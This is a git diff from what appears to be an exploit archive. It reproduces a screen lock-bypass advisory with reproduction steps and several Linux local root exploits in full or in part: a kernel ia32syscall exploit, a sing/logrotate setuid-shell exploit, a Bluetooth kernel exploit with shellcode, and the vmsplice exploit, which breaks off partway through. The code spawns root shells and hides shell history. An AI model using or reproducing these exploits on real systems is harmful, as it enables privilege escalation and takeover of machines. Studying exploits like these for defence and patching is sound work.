@@ -1,64 +1,64 @@ - _ _ _____ _ ___ _____ _ _ - / / / / ____/ / / _/_ __/ / / / - / /_/ / __/ / / / / / / / /_/ / - / __ / /___/ /____/ / / / / __ / - /_/ /_/_____/_____/___/ /_/ /_/ /_/ - Helith - 0815 --------------------------------------------------------------------------------- - -Author : Rembrandt -Date : 2007-06-03 -Affected Software: screen <= 4.0.3 -Affected OS : OpenBSD up to 4.4 (and propably others) -Type : Local Authentication Bypass - -OSVDB : 39587 -Milw0rm : 4028 -CVE : 2007-3048 -ISS X-Force: : 34693 - -screen, on some operating systems, is vulnerable to a local terminal screen -lock authentication bypass that may allow physically proximate attackers to -gain access to the system. - -This issue has been confirmed on OpenBSD with screen 4.0.3 on x86/amd64. -The underlying vulnerability may be related to 3rd party authentication such -as PAM. This issue was tested on OpenSuSE with screen 4.0.2 and was not -vulnerable. - - -Steps to reproduce: - -$ screen -S test -[Screened session starts] -$ id -uid=1001(test) gid=1001(test) groups=1001(test) -$ -[type ctrl-a x] -Key: test -Again: test -Screen used by test . -Password: -[type ctrl-c] -$ screen -r -[Regained access to screen, without password] - -The screen lock mechanism is designed to lock a terminal, not the entire shell -session. If an attacker has shell access to the target account, it is understood -they can bypass protection. However, on the system tested, the screen lock -mechanism was bypassed using 'ctrl-c'. - -The vulnerability is not in OpenBSD. screen developers indicate this is known -behavior, but do not appear to fully understand the scenario with which -this can be abused. Replies to my initial disclosure suggest this may be -related to PAM authentication, or another 3rd party package. Testing was -not performed to fully identify the vulnerable code. - -Tobias Ulmer has committed a patch to the screen code that prevents -this exploit from happening. 
- - -Kind regards, -Rembrandt - -# milw0rm.com [2008-06-18] + _ _ _____ _ ___ _____ _ _ + / / / / ____/ / / _/_ __/ / / / + / /_/ / __/ / / / / / / / /_/ / + / __ / /___/ /____/ / / / / __ / + /_/ /_/_____/_____/___/ /_/ /_/ /_/ + Helith - 0815 +-------------------------------------------------------------------------------- + +Author : Rembrandt +Date : 2007-06-03 +Affected Software: screen <= 4.0.3 +Affected OS : OpenBSD up to 4.4 (and propably others) +Type : Local Authentication Bypass + +OSVDB : 39587 +Milw0rm : 4028 +CVE : 2007-3048 +ISS X-Force: : 34693 + +screen, on some operating systems, is vulnerable to a local terminal screen +lock authentication bypass that may allow physically proximate attackers to +gain access to the system. + +This issue has been confirmed on OpenBSD with screen 4.0.3 on x86/amd64. +The underlying vulnerability may be related to 3rd party authentication such +as PAM. This issue was tested on OpenSuSE with screen 4.0.2 and was not +vulnerable. + + +Steps to reproduce: + +$ screen -S test +[Screened session starts] +$ id +uid=1001(test) gid=1001(test) groups=1001(test) +$ +[type ctrl-a x] +Key: test +Again: test +Screen used by test . +Password: +[type ctrl-c] +$ screen -r +[Regained access to screen, without password] + +The screen lock mechanism is designed to lock a terminal, not the entire shell +session. If an attacker has shell access to the target account, it is understood +they can bypass protection. However, on the system tested, the screen lock +mechanism was bypassed using 'ctrl-c'. + +The vulnerability is not in OpenBSD. screen developers indicate this is known +behavior, but do not appear to fully understand the scenario with which +this can be abused. Replies to my initial disclosure suggest this may be +related to PAM authentication, or another 3rd party package. Testing was +not performed to fully identify the vulnerable code. 
+ +Tobias Ulmer has committed a patch to the screen code that prevents +this exploit from happening. + + +Kind regards, +Rembrandt + +# milw0rm.com [2008-06-18] diff --git a/platforms/linux/local/417.c b/platforms/linux/local/417.c index 7b27425b6..306dcb6a0 100755 --- a/platforms/linux/local/417.c +++ b/platforms/linux/local/417.c @@ -139,6 +139,6 @@ free(buf2); return 1; -} - -// milw0rm.com [2004-08-25] +} + +// milw0rm.com [2004-08-25] diff --git a/platforms/linux/local/434.sh b/platforms/linux/local/434.sh index 7408b2e95..6cc1f6910 100755 --- a/platforms/linux/local/434.sh +++ b/platforms/linux/local/434.sh @@ -68,6 +68,6 @@ fi rm -f getuid_lib.so unlink $HOME/.cdrdao echo "Entering rootshell ... ;]" -./suid - -# milw0rm.com [2004-09-07] +./suid + +# milw0rm.com [2004-09-07] diff --git a/platforms/linux/local/438.c b/platforms/linux/local/438.c index 11f090344..448a18158 100755 --- a/platforms/linux/local/438.c +++ b/platforms/linux/local/438.c @@ -53,6 +53,6 @@ export RSH=$RSHSAVE export RSHSAVE= # Use our suid bash -./bash -p - -// milw0rm.com [2004-09-11] +./bash -p + +// milw0rm.com [2004-09-11] diff --git a/platforms/linux/local/4460.c b/platforms/linux/local/4460.c index d2105cecd..210ac0e6d 100755 --- a/platforms/linux/local/4460.c +++ b/platforms/linux/local/4460.c 
@@ -1,139 +1,139 @@ -/* - * exploit for x86_64 linux kernel ia32syscall emulation - * bug, discovered by Wojciech Purczynski - * - * by - * Robert Swiecki - * Przemyslaw Frasunek - * Pawel Pisarczyk - * of ATM-Lab http://www.atm-lab.pl - */ - -#include -#include -#include -#include -#include -#include -#include -#include -#include - -uint32_t uid, euid, suid; - -static void kernelmodecode(void) -{ - int i; - uint8_t *gs; - uint32_t *ptr; - - asm volatile ("movq %%gs:(0x0), %0" : "=r"(gs)); - - for (i = 200; i < 1000; i+=1) { - - ptr = (uint32_t*) (gs + i); - - if ((ptr[0] == uid) && (ptr[1] == euid) - && (ptr[2] == suid) && (ptr[3] == uid)) { - ptr[0] = 0; //UID - ptr[1] = 0; //EUID - ptr[2] = 0; //SUID - - break; - } - } - -} - -static void docall(uint64_t *ptr, uint64_t size) -{ - getresuid(&uid, &euid, &suid); - - uint64_t tmp = ((uint64_t)ptr & ~0x00000000000FFF); - - if (mmap((void*)tmp, size, PROT_READ|PROT_WRITE|PROT_EXEC, - MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) { - printf("mmap fault\n"); - exit(1); - } - - for (; ptr < (tmp + size); ptr++) - *ptr = (uint64_t)kernelmodecode; - - __asm__("\n" - "\tmovq $0x101, %rax\n" - "\tint $0x80\n"); - - printf("UID %d, EUID:%d GID:%d, EGID:%d\n", getuid(), geteuid(), getgid(), getegid()); - execl("/bin/sh", "bin/sh", 0); - printf("no /bin/sh ??\n"); - exit(0); -} - -int main(int argc, char **argv) -{ - int pid, status, set = 0; - uint64_t rax; - uint64_t kern_s = 0xffffffff80000000; - uint64_t kern_e = 0xffffffff84000000; - uint64_t off = 0x0000000800000101 * 8; - - if (argc == 4) { - docall((uint64_t*)(kern_s + off), kern_e - kern_s); - exit(0); - } - - if ((pid = fork()) == 0) { - ptrace(PTRACE_TRACEME, 0, 0, 0); - execl(argv[0], argv[0], "2", "3", "4", 0); - perror("exec fault"); - exit(1); - } - - if (pid == -1) { - printf("fork fault\n"); - exit(1); - } - - for (;;) { - if (wait(&status) != pid) - continue; - - if (WIFEXITED(status)) { - printf("Process finished\n"); - break; - } - - if 
(!WIFSTOPPED(status)) - continue; - - if (WSTOPSIG(status) != SIGTRAP) { - printf("Process received signal: %d\n", WSTOPSIG(status)); - break; - } - - rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0); - if (rax == 0x000000000101) { - if (ptrace(PTRACE_POKEUSER, pid, 8*ORIG_RAX, off/8) == -1) { - printf("PTRACE_POKEUSER fault\n"); - exit(1); - } - set = 1; - } - - if ((rax == 11) && set) { - ptrace(PTRACE_DETACH, pid, 0, 0); - for(;;) - sleep(10000); - } - - if (ptrace(PTRACE_SYSCALL, pid, 1, 0) == -1) { - printf("PTRACE_SYSCALL fault\n"); - exit(1); - } - } - - return 0; -} - -// milw0rm.com [2007-09-27] +/* + * exploit for x86_64 linux kernel ia32syscall emulation + * bug, discovered by Wojciech Purczynski + * + * by + * Robert Swiecki + * Przemyslaw Frasunek + * Pawel Pisarczyk + * of ATM-Lab http://www.atm-lab.pl + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include + +uint32_t uid, euid, suid; + +static void kernelmodecode(void) +{ + int i; + uint8_t *gs; + uint32_t *ptr; + + asm volatile ("movq %%gs:(0x0), %0" : "=r"(gs)); + + for (i = 200; i < 1000; i+=1) { + + ptr = (uint32_t*) (gs + i); + + if ((ptr[0] == uid) && (ptr[1] == euid) + && (ptr[2] == suid) && (ptr[3] == uid)) { + ptr[0] = 0; //UID + ptr[1] = 0; //EUID + ptr[2] = 0; //SUID + + break; + } + } + +} + +static void docall(uint64_t *ptr, uint64_t size) +{ + getresuid(&uid, &euid, &suid); + + uint64_t tmp = ((uint64_t)ptr & ~0x00000000000FFF); + + if (mmap((void*)tmp, size, PROT_READ|PROT_WRITE|PROT_EXEC, + MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) { + printf("mmap fault\n"); + exit(1); + } + + for (; ptr < (tmp + size); ptr++) + *ptr = (uint64_t)kernelmodecode; + + __asm__("\n" + "\tmovq $0x101, %rax\n" + "\tint $0x80\n"); + + printf("UID %d, EUID:%d GID:%d, EGID:%d\n", getuid(), geteuid(), getgid(), getegid()); + execl("/bin/sh", "bin/sh", 0); + printf("no /bin/sh ??\n"); + exit(0); +} + +int main(int argc, char **argv) +{ + int pid, 
status, set = 0; + uint64_t rax; + uint64_t kern_s = 0xffffffff80000000; + uint64_t kern_e = 0xffffffff84000000; + uint64_t off = 0x0000000800000101 * 8; + + if (argc == 4) { + docall((uint64_t*)(kern_s + off), kern_e - kern_s); + exit(0); + } + + if ((pid = fork()) == 0) { + ptrace(PTRACE_TRACEME, 0, 0, 0); + execl(argv[0], argv[0], "2", "3", "4", 0); + perror("exec fault"); + exit(1); + } + + if (pid == -1) { + printf("fork fault\n"); + exit(1); + } + + for (;;) { + if (wait(&status) != pid) + continue; + + if (WIFEXITED(status)) { + printf("Process finished\n"); + break; + } + + if (!WIFSTOPPED(status)) + continue; + + if (WSTOPSIG(status) != SIGTRAP) { + printf("Process received signal: %d\n", WSTOPSIG(status)); + break; + } + + rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0); + if (rax == 0x000000000101) { + if (ptrace(PTRACE_POKEUSER, pid, 8*ORIG_RAX, off/8) == -1) { + printf("PTRACE_POKEUSER fault\n"); + exit(1); + } + set = 1; + } + + if ((rax == 11) && set) { + ptrace(PTRACE_DETACH, pid, 0, 0); + for(;;) + sleep(10000); + } + + if (ptrace(PTRACE_SYSCALL, pid, 1, 0) == -1) { + printf("PTRACE_SYSCALL fault\n"); + exit(1); + } + } + + return 0; +} + +// milw0rm.com [2007-09-27] diff --git a/platforms/linux/local/466.pl b/platforms/linux/local/466.pl index 01eb2f979..f04a6397a 100755 --- a/platforms/linux/local/466.pl +++ b/platforms/linux/local/466.pl @@ -22,6 +22,6 @@ $buffer .= " "; $buffer .= "B" x 290; -exec("$target -nb $buffer"); - -# milw0rm.com [2004-09-16] +exec("$target -nb $buffer"); + +# milw0rm.com [2004-09-16] diff --git a/platforms/linux/local/469.c b/platforms/linux/local/469.c index 6f7bb54e5..5c482f6bf 100755 --- a/platforms/linux/local/469.c +++ b/platforms/linux/local/469.c @@ -42,6 +42,6 @@ gcc -o ss ss.c export RSH=/tmp/s $READCD dev=REMOTE:brk.chroot.org:1,0,1 1 >/dev/null 2>&1 /tmp/ss - - -// milw0rm.com [2004-09-19] + + +// milw0rm.com [2004-09-19] 
diff --git a/platforms/linux/local/4698.c b/platforms/linux/local/4698.c
index 23d8d58b8..1c582fc70 100755
--- a/platforms/linux/local/4698.c
+++ b/platforms/linux/local/4698.c
@@ -1,58 +1,58 @@ -/* - sing file append exploit - by bannedit - - 12/05/2007 - - The original reporter of this issue included an example session which - added an account to the machine. - - The method for this exploit is slightly different and much more - quiet. Although it relies upon logrotate for help. - - This could easily be modified to work with cron daemons which - are not too strict about the cron file format. However, - when I tested vixie cron it appears that there are - better checks for file format compilance these days. -*/ - -#include -#include -#include - -#define SING_PATH "/usr/bin/sing" - -char *file = "/etc/logrotate.d/sing"; -char *evilname = "\n/tmp/sing {\n daily\n size=0\n firstaction\n chown root /tmp/shell; chmod 4755 /tmp/shell; rm -f /etc/logrotate.d/sing; rm -f /tmp/sing*\n endscript\n}\n\n\n"; - - - -int main() -{ -FILE *fp; -int pid; - - puts("sing file append exploit"); - puts("------------------------"); - puts("by bannedit"); - - if(fp = fopen("/tmp/shell", "w+")) - { - fputs("#!/bin/bash\n", fp); - fputs("/bin/bash -p", fp); - fclose(fp); - system("touch /tmp/sing; echo garbage >> /tmp/sing"); - } - else - { - puts("error making shell file"); - exit(-1); - } - - sleep(5); - printf("done sleeping...\n"); - execl(SING_PATH, evilname, "-Q", "-c", "1", "-L", file, "localhost", 0); - return 0; -} - -// milw0rm.com [2007-12-06] +/* + sing file append exploit + by bannedit + + 12/05/2007 + + The original reporter of this issue included an example session which + added an account to the machine. + + The method for this exploit is slightly different and much more + quiet. Although it relies upon logrotate for help. + + This could easily be modified to work with cron daemons which + are not too strict about the cron file format. However, + when I tested vixie cron it appears that there are + better checks for file format compilance these days. 
+*/ + +#include +#include +#include + +#define SING_PATH "/usr/bin/sing" + +char *file = "/etc/logrotate.d/sing"; +char *evilname = "\n/tmp/sing {\n daily\n size=0\n firstaction\n chown root /tmp/shell; chmod 4755 /tmp/shell; rm -f /etc/logrotate.d/sing; rm -f /tmp/sing*\n endscript\n}\n\n\n"; + + + +int main() +{ +FILE *fp; +int pid; + + puts("sing file append exploit"); + puts("------------------------"); + puts("by bannedit"); + + if(fp = fopen("/tmp/shell", "w+")) + { + fputs("#!/bin/bash\n", fp); + fputs("/bin/bash -p", fp); + fclose(fp); + system("touch /tmp/sing; echo garbage >> /tmp/sing"); + } + else + { + puts("error making shell file"); + exit(-1); + } + + sleep(5); + printf("done sleeping...\n"); + execl(SING_PATH, evilname, "-Q", "-c", "1", "-L", file, "localhost", 0); + return 0; +} + +// milw0rm.com [2007-12-06] diff --git a/platforms/linux/local/470.c b/platforms/linux/local/470.c index 4b1ca12f4..988b3a95a 100755 --- a/platforms/linux/local/470.c +++ b/platforms/linux/local/470.c @@ -107,6 +107,6 @@ int main( int argc, char *argv[] ) return( 0 ); } - - -// milw0rm.com [2004-09-21] + + +// milw0rm.com [2004-09-21] diff --git a/platforms/linux/local/4756.c b/platforms/linux/local/4756.c index f35de49a2..8ef5dba53 100755 --- a/platforms/linux/local/4756.c +++ b/platforms/linux/local/4756.c 
@@ -1,168 +1,167 @@ - -/* LINUX KERNEL < 2.6.11.5 BLUETOOTH STACK LOCAL ROOT EXPLOIT -* -* 19 October 2005 - -http://backdoored.net -Visit us for Undetected keyloggers and packers.Thanx - - -h4x0r bluetooth $ id -uid=1000(addicted) gid=100(users) groups=100(users) -h4x0r bluetooth $ - -h4x0r bluetooth $ ./backdoored-bluetooth -KERNEL Oops. Exit Code = 11.(Segmentation fault) -KERNEL Oops. Exit Code = 11.(Segmentation fault) -KERNEL Oops. Exit Code = 11.(Segmentation fault) -KERNEL Oops. Exit Code = 11.(Segmentation fault) -KERNEL Oops. Exit Code = 11.(Segmentation fault) -Checking the Effective user id after overflow : UID = 0 -h4x0r bluetooth # id -uid=0(root) gid=0(root) groups=100(users) -h4x0r bluetooth # - -h4x0r bluetooth # dmesg -PREEMPT SMP -Modules linked in: -CPU: 0 -EIP: 0060:[] Not tainted VLI -EFLAGS: 00010286 (2.6.9) -EIP is at bt_sock_create+0x3d/0x130 -eax: ffffffff ebx: ffebfe34 ecx: 00000000 edx: c051bea0 -esi: ffffffa3 edi: ffffff9f ebp: 00000001 esp: c6729f1c -ds: 007b es: 007b ss: 0068 -Process backdoored-bluetooth (pid: 8809, threadinfo=c6729000 task=c6728a20) -Stack: cef24e00 0000001f 0000001f c6581680 ffffff9f c039a3bb c6581680 ffebfe34 - 00000001 b8000c80 bffff944 c6729000 c039a58d 0000001f 00000003 ffebfe34 - c6729f78 00000000 c039a60b 0000001f 00000003 ffebfe34 c6729f78 b8000c80 -Call Trace: - [] __sock_create+0xfb/0x2a0 - [] sock_create+0x2d/0x40 - [] sys_socket+0x2b/0x60 - [] sys_socketcall+0x68/0x260 - [] finish_task_switch+0x3c/0x90 - [] schedule_tail+0x17/0x50 - [] do_page_fault+0x0/0x5e9 - [] syscall_call+0x7/0xb -Code: 24 0c 89 7c 24 10 83 fb 07 0f 8f b1 00 00 00 8b 04 9d 60 a4 5d c0 85 c0 0f 84 d7 00 00 00 85 c0 be a3 ff ff ff 0f 84 93 00 00 00 <8b> 50 10 bf 01 00 00 00 -85 d2 74 37 b8 00 f0 ff ff 21 e0 ff 40 - -*/ - - -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#define KERNEL_SPACE_MEMORY_BRUTE_START 0xc0000000 -#define KERNEL_SPACE_MEMORY_BRUTE_END 0xffffffff -#define 
KERNEL_SPACE_BUFFER 0x100000 - - -char asmcode[] = /*Global shellcode*/ - -"\xb8\x00\xf0\xff\xff\x31\xc9\x21\xe0\x8b\x10\x89\x8a" -"\x80\x01\x00\x00\x31\xc9\x89\x8a\x7c\x01\x00\x00\x8b" -"\x00\x31\xc9\x31\xd2\x89\x88\x90\x01\x00\x00\x89\x90" -"\x8c\x01\x00\x00\xb8\xff\xff\xff\xff\xc3"; - - - -struct net_proto_family { - int family; - int (*create) (int *sock, int protocol); - short authentication; - short encryption; - short encrypt_net; - int *owner; - }; - - -int check_zombie_child(int status,pid_t pid) -{ - waitpid(pid,&status,0); - if(WIFEXITED(status)) - { - if(WEXITSTATUS(status) != 0xFF) - exit(-1); - } - else if (WIFSIGNALED(status)) - { - printf("KERNEL Oops. Exit Code = %d.(%s)\n",WTERMSIG(status),strsignal(WTERMSIG(status))); - return(WTERMSIG(status)); - } -} - - -int brute_socket_create (int negative_proto_number) -{ - socket(AF_BLUETOOTH,SOCK_RAW, negative_proto_number); /* overflowing proto number with negative 32bit value */ - int i; - i = geteuid(); - printf("Checking the Effective user id after overflow : UID = %d\n",i); -if(i) -exit(EXIT_FAILURE); - printf("0wnage D0ne bro.\n"); - execl("/bin/sh","sh",NULL); - exit(EXIT_SUCCESS); -} - - -int main(void) -{ - -pid_t pid; -int counter; -int status; -int *kernel_return; - -char kernel_buffer[KERNEL_SPACE_BUFFER]; -unsigned int brute_start; -unsigned int where_kernel; - -struct net_proto_family *bluetooth; - -bluetooth = (struct net_proto_family *) malloc(sizeof(struct net_proto_family)); -bzero(bluetooth,sizeof(struct net_proto_family)); - -bluetooth->family = AF_BLUETOOTH; -bluetooth->authentication = 0x0; /* No Authentication */ -bluetooth->encryption = 0x0; /* No Encryption */ -bluetooth->encrypt_net = 0x0; /* No Encrypt_net */ -bluetooth->owner = 0x0; /* No fucking owner */ -bluetooth->create = (int *) asmcode; - - - -kernel_return = (int *) kernel_buffer; - -for( counter = 0; counter < KERNEL_SPACE_BUFFER; counter+=4, kernel_return++) - *kernel_return = (int)bluetooth; - -brute_start = 
KERNEL_SPACE_MEMORY_BRUTE_START; -printf("Bluetooth stack local root exploit\n"); -printf("http://backdoored/net"); - -while ( brute_start < KERNEL_SPACE_MEMORY_BRUTE_END ) - { - where_kernel = (brute_start - (unsigned int)&kernel_buffer) / 0x4 ; - where_kernel = -where_kernel; - - pid = fork(); - if(pid == 0 ) - brute_socket_create(where_kernel); - check_zombie_child(status,pid); - brute_start += KERNEL_SPACE_BUFFER; - fflush(stdout); -} -return 0; -} - -// milw0rm.com [2007-12-18] +/* LINUX KERNEL < 2.6.11.5 BLUETOOTH STACK LOCAL ROOT EXPLOIT +* +* 19 October 2005 + +http://backdoored.net +Visit us for Undetected keyloggers and packers.Thanx + + +h4x0r bluetooth $ id +uid=1000(addicted) gid=100(users) groups=100(users) +h4x0r bluetooth $ + +h4x0r bluetooth $ ./backdoored-bluetooth +KERNEL Oops. Exit Code = 11.(Segmentation fault) +KERNEL Oops. Exit Code = 11.(Segmentation fault) +KERNEL Oops. Exit Code = 11.(Segmentation fault) +KERNEL Oops. Exit Code = 11.(Segmentation fault) +KERNEL Oops. 
Exit Code = 11.(Segmentation fault) +Checking the Effective user id after overflow : UID = 0 +h4x0r bluetooth # id +uid=0(root) gid=0(root) groups=100(users) +h4x0r bluetooth # + +h4x0r bluetooth # dmesg +PREEMPT SMP +Modules linked in: +CPU: 0 +EIP: 0060:[] Not tainted VLI +EFLAGS: 00010286 (2.6.9) +EIP is at bt_sock_create+0x3d/0x130 +eax: ffffffff ebx: ffebfe34 ecx: 00000000 edx: c051bea0 +esi: ffffffa3 edi: ffffff9f ebp: 00000001 esp: c6729f1c +ds: 007b es: 007b ss: 0068 +Process backdoored-bluetooth (pid: 8809, threadinfo=c6729000 task=c6728a20) +Stack: cef24e00 0000001f 0000001f c6581680 ffffff9f c039a3bb c6581680 ffebfe34 + 00000001 b8000c80 bffff944 c6729000 c039a58d 0000001f 00000003 ffebfe34 + c6729f78 00000000 c039a60b 0000001f 00000003 ffebfe34 c6729f78 b8000c80 +Call Trace: + [] __sock_create+0xfb/0x2a0 + [] sock_create+0x2d/0x40 + [] sys_socket+0x2b/0x60 + [] sys_socketcall+0x68/0x260 + [] finish_task_switch+0x3c/0x90 + [] schedule_tail+0x17/0x50 + [] do_page_fault+0x0/0x5e9 + [] syscall_call+0x7/0xb +Code: 24 0c 89 7c 24 10 83 fb 07 0f 8f b1 00 00 00 8b 04 9d 60 a4 5d c0 85 c0 0f 84 d7 00 00 00 85 c0 be a3 ff ff ff 0f 84 93 00 00 00 <8b> 50 10 bf 01 00 00 00 +85 d2 74 37 b8 00 f0 ff ff 21 e0 ff 40 + +*/ + + +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define KERNEL_SPACE_MEMORY_BRUTE_START 0xc0000000 +#define KERNEL_SPACE_MEMORY_BRUTE_END 0xffffffff +#define KERNEL_SPACE_BUFFER 0x100000 + + +char asmcode[] = /*Global shellcode*/ + +"\xb8\x00\xf0\xff\xff\x31\xc9\x21\xe0\x8b\x10\x89\x8a" +"\x80\x01\x00\x00\x31\xc9\x89\x8a\x7c\x01\x00\x00\x8b" +"\x00\x31\xc9\x31\xd2\x89\x88\x90\x01\x00\x00\x89\x90" +"\x8c\x01\x00\x00\xb8\xff\xff\xff\xff\xc3"; + + + +struct net_proto_family { + int family; + int (*create) (int *sock, int protocol); + short authentication; + short encryption; + short encrypt_net; + int *owner; + }; + + +int check_zombie_child(int status,pid_t pid) +{ + waitpid(pid,&status,0); + 
if(WIFEXITED(status)) + { + if(WEXITSTATUS(status) != 0xFF) + exit(-1); + } + else if (WIFSIGNALED(status)) + { + printf("KERNEL Oops. Exit Code = %d.(%s)\n",WTERMSIG(status),strsignal(WTERMSIG(status))); + return(WTERMSIG(status)); + } +} + + +int brute_socket_create (int negative_proto_number) +{ + socket(AF_BLUETOOTH,SOCK_RAW, negative_proto_number); /* overflowing proto number with negative 32bit value */ + int i; + i = geteuid(); + printf("Checking the Effective user id after overflow : UID = %d\n",i); +if(i) +exit(EXIT_FAILURE); + printf("0wnage D0ne bro.\n"); + execl("/bin/sh","sh",NULL); + exit(EXIT_SUCCESS); +} + + +int main(void) +{ + +pid_t pid; +int counter; +int status; +int *kernel_return; + +char kernel_buffer[KERNEL_SPACE_BUFFER]; +unsigned int brute_start; +unsigned int where_kernel; + +struct net_proto_family *bluetooth; + +bluetooth = (struct net_proto_family *) malloc(sizeof(struct net_proto_family)); +bzero(bluetooth,sizeof(struct net_proto_family)); + +bluetooth->family = AF_BLUETOOTH; +bluetooth->authentication = 0x0; /* No Authentication */ +bluetooth->encryption = 0x0; /* No Encryption */ +bluetooth->encrypt_net = 0x0; /* No Encrypt_net */ +bluetooth->owner = 0x0; /* No fucking owner */ +bluetooth->create = (int *) asmcode; + + + +kernel_return = (int *) kernel_buffer; + +for( counter = 0; counter < KERNEL_SPACE_BUFFER; counter+=4, kernel_return++) + *kernel_return = (int)bluetooth; + +brute_start = KERNEL_SPACE_MEMORY_BRUTE_START; +printf("Bluetooth stack local root exploit\n"); +printf("http://backdoored/net"); + +while ( brute_start < KERNEL_SPACE_MEMORY_BRUTE_END ) + { + where_kernel = (brute_start - (unsigned int)&kernel_buffer) / 0x4 ; + where_kernel = -where_kernel; + + pid = fork(); + if(pid == 0 ) + brute_socket_create(where_kernel); + check_zombie_child(status,pid); + brute_start += KERNEL_SPACE_BUFFER; + fflush(stdout); +} +return 0; +} + +// milw0rm.com [2007-12-18] 
diff --git a/platforms/linux/local/476.c b/platforms/linux/local/476.c index 0c8036d92..75aebdcdd 100755 --- a/platforms/linux/local/476.c +++ b/platforms/linux/local/476.c @@ -37,6 +37,6 @@ printf(" by CoKi "); execle(PATH, "dupescan", buf, NULL, env); } - - -// milw0rm.com [2004-09-23] + + +// milw0rm.com [2004-09-23] diff --git a/platforms/linux/local/479.c b/platforms/linux/local/479.c index b6cc68def..6d7743eec 100755 --- a/platforms/linux/local/479.c +++ b/platforms/linux/local/479.c @@ -338,6 +338,6 @@ void banner(void) { fputs("\tGNU SharUtils <= 4.2.1 Local Format String Exploit\n" "\tnarkotix@linuxmail.org\n",stdout); } - - -// milw0rm.com [2004-09-25] + + +// milw0rm.com [2004-09-25] diff --git a/platforms/linux/local/5092.c b/platforms/linux/local/5092.c index 78373f0ce..8d6a66553 100755 --- a/platforms/linux/local/5092.c +++ b/platforms/linux/local/5092.c 
@@ -1,289 +1,289 @@ -/* - * jessica_biel_naked_in_my_bed.c - * - * Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura. - * Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca. - * Stejnak je to stare jak cyp a aj jakesyk rozbite. - * - * Linux vmsplice Local Root Exploit - * By qaaz - * - * Linux 2.6.17 - 2.6.24.1 - * - * This is quite old code and I had to rewrite it to even compile. - * It should work well, but I don't remeber original intent of all - * the code, so I'm not 100% sure about it. You've been warned ;) - * - * -static -Wno-format - */ -#define _GNU_SOURCE -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#define __KERNEL__ -#include - -#define PIPE_BUFFERS 16 -#define PG_compound 14 -#define uint unsigned int -#define static_inline static inline __attribute__((always_inline)) -#define STACK(x) (x + sizeof(x) - 40) - -struct page { - unsigned long flags; - int count; - int mapcount; - unsigned long private; - void *mapping; - unsigned long index; - struct { long next, prev; } lru; -}; - -void exit_code(); -char exit_stack[1024 * 1024]; - -void die(char *msg, int err) -{ - printf(err ? 
"[-] %s: %s\n" : "[-] %s\n", msg, strerror(err)); - fflush(stdout); - fflush(stderr); - exit(1); -} - -#if defined (__i386__) - -#ifndef __NR_vmsplice -#define __NR_vmsplice 316 -#endif - -#define USER_CS 0x73 -#define USER_SS 0x7b -#define USER_FL 0x246 - -static_inline -void exit_kernel() -{ - __asm__ __volatile__ ( - "movl %0, 0x10(%%esp) ;" - "movl %1, 0x0c(%%esp) ;" - "movl %2, 0x08(%%esp) ;" - "movl %3, 0x04(%%esp) ;" - "movl %4, 0x00(%%esp) ;" - "iret" - : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL), - "i" (USER_CS), "r" (exit_code) - ); -} - -static_inline -void * get_current() -{ - unsigned long curr; - __asm__ __volatile__ ( - "movl %%esp, %%eax ;" - "andl %1, %%eax ;" - "movl (%%eax), %0" - : "=r" (curr) - : "i" (~8191) - ); - return (void *) curr; -} - -#elif defined (__x86_64__) - -#ifndef __NR_vmsplice -#define __NR_vmsplice 278 -#endif - -#define USER_CS 0x23 -#define USER_SS 0x2b -#define USER_FL 0x246 - -static_inline -void exit_kernel() -{ - __asm__ __volatile__ ( - "swapgs ;" - "movq %0, 0x20(%%rsp) ;" - "movq %1, 0x18(%%rsp) ;" - "movq %2, 0x10(%%rsp) ;" - "movq %3, 0x08(%%rsp) ;" - "movq %4, 0x00(%%rsp) ;" - "iretq" - : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL), - "i" (USER_CS), "r" (exit_code) - ); -} - -static_inline -void * get_current() -{ - unsigned long curr; - __asm__ __volatile__ ( - "movq %%gs:(0), %0" - : "=r" (curr) - ); - return (void *) curr; -} - -#else -#error "unsupported arch" -#endif - -#if defined (_syscall4) -#define __NR__vmsplice __NR_vmsplice -_syscall4( - long, _vmsplice, - int, fd, - struct iovec *, iov, - unsigned long, nr_segs, - unsigned int, flags) - -#else -#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl)) -#endif - -static uint uid, gid; - -void kernel_code() -{ - int i; - uint *p = get_current(); - - for (i = 0; i < 1024-13; i++) { - if (p[0] == uid && p[1] == uid && - p[2] == uid && p[3] == uid && - p[4] == gid && p[5] == gid && - p[6] == gid && p[7] == gid) 
{ - p[0] = p[1] = p[2] = p[3] = 0; - p[4] = p[5] = p[6] = p[7] = 0; - p = (uint *) ((char *)(p + 8) + sizeof(void *)); - p[0] = p[1] = p[2] = ~0; - break; - } - p++; - } - - exit_kernel(); -} - -void exit_code() -{ - if (getuid() != 0) - die("wtf", 0); - - printf("[+] root\n"); - putenv("HISTFILE=/dev/null"); - execl("/bin/bash", "bash", "-i", NULL); - die("/bin/bash", errno); -} - -int main(int argc, char *argv[]) -{ - int pi[2]; - size_t map_size; - char * map_addr; - struct iovec iov; - struct page * pages[5]; - - uid = getuid(); - gid = getgid(); - setresuid(uid, uid, uid); - setresgid(gid, gid, gid); - - printf("-----------------------------------\n"); - printf(" Linux vmsplice Local Root Exploit\n"); - printf(" By qaaz\n"); - printf("-----------------------------------\n"); - - if (!uid || !gid) - die("!@#$", 0); - - /*****/ - pages[0] = *(void **) &(int[2]){0,PAGE_SIZE}; - pages[1] = pages[0] + 1; - - map_size = PAGE_SIZE; - map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE, - MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); - if (map_addr == MAP_FAILED) - die("mmap", errno); - - memset(map_addr, 0, map_size); - printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size); - printf("[+] page: 0x%lx\n", pages[0]); 